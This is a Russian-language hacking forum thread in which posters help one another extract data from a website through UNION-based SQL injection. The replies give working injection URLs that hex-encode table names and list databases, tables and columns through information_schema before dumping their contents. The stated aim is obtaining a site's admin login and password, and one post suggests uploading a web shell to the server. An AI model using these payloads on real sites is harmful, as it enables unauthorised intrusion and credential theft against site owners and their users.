PDA

Просмотр полной версии : Помогите составить правильный запрос

br1tva
15.04.2010, 19:05
Когда составляю запрос UNION+SELECT+1,2,column_name+from+information_sche ma.columns+limit+1,1-- то мне выводятся колонки первого столбца , когда составляю запрос а виде - UNION+SELECT+1,2,column_name+from+information_sche ma.columns+where+table_name='isearch_admin_log'-- начинает ругаться и нефига не выводит ... Помогите составить правильный запрос .
wildshaman
15.04.2010, 19:06
Название таблицы захекси
-=Razor=-
15.04.2010, 20:21
Попробуй так.UNION+SELECT+1,2,column_name+from+informati on_sche ma.columns+where+table_name=0x697365617263685f6164 6d696e5f6c6f67
br1tva
15.04.2010, 20:36
на одном сайте может быть 2 базы данных ?? В одной дапустим новости , коменты и прочая фигня , а во второй базе пароли админа ?? )
Перебрал всю information_schemu Усернайма и пароля от админки нигде нету .... Ктонить с таким сталкивался????
aka_zver
15.04.2010, 20:40
на одном сайте может быть 2 базы данных ??
да
В одной дапустим новости , коменты и прочая фигня , а во второй базе пароли админа ?? )
да
Перебрал всю information_schemu Усернайма и пароля от админки нигде нету .... Ктонить с таким сталкивался????
сталкивался, просматривай остальные БД
xcedz
15.04.2010, 20:40
на одном сайте может быть 2 базы данных ?? В одной дапустим новости , коменты и прочая фигня , а во второй базе пароли админа ?? )
Перебрал всю information_schemu Усернайма и пароля от админки нигде нету .... Ктонить с таким сталкивался????
естевенно бывает. :) конекты в настройках и в другую бд можно сделать. :)

хз. реверсни ip мож найдешь варики как залить шел на сервак а там и разберешься что к чему)
br1tva
15.04.2010, 20:42
Надо было сразу спросить : Как посмотреть какие базы висят на сайте и как просмотреть другую базу .

Разобрался , спасибо )
aka_zver
15.04.2010, 20:45
Надо было сразу спросить : Как посмотреть какие базы висят на сайте и как просмотреть другую базу .
Пример:

Все БД:
http://www.site.com/index.php?id=-1+union+select+group_concat(0x0b,schema_name)+from +information_schema.schemata--+

Таблицы из нужной БД:
http://www.site.com/index.php?id=-1+union+select+group_concat(0x0b,table_name)+from+ information_schema.tables+where+table_schema='им я_бд'--+

Колонки из нужной таблицы из нужной БД:
http://www.site.com/index.php?id=-1+union+select+group_concat(0x0b,column_name)+from +information_schema.columns+where+table_name='им я_таблицы'+and+table_schema='имя_бд'--+

Данные из нужной таблицы из нужной БД:
http://www.site.com/index.php?id=-1+union+select+group_concat(имя_колонки) +from+имя_бд.имя_таблицы--+

З.Ы. а чё тема в болталке-то ? :confused: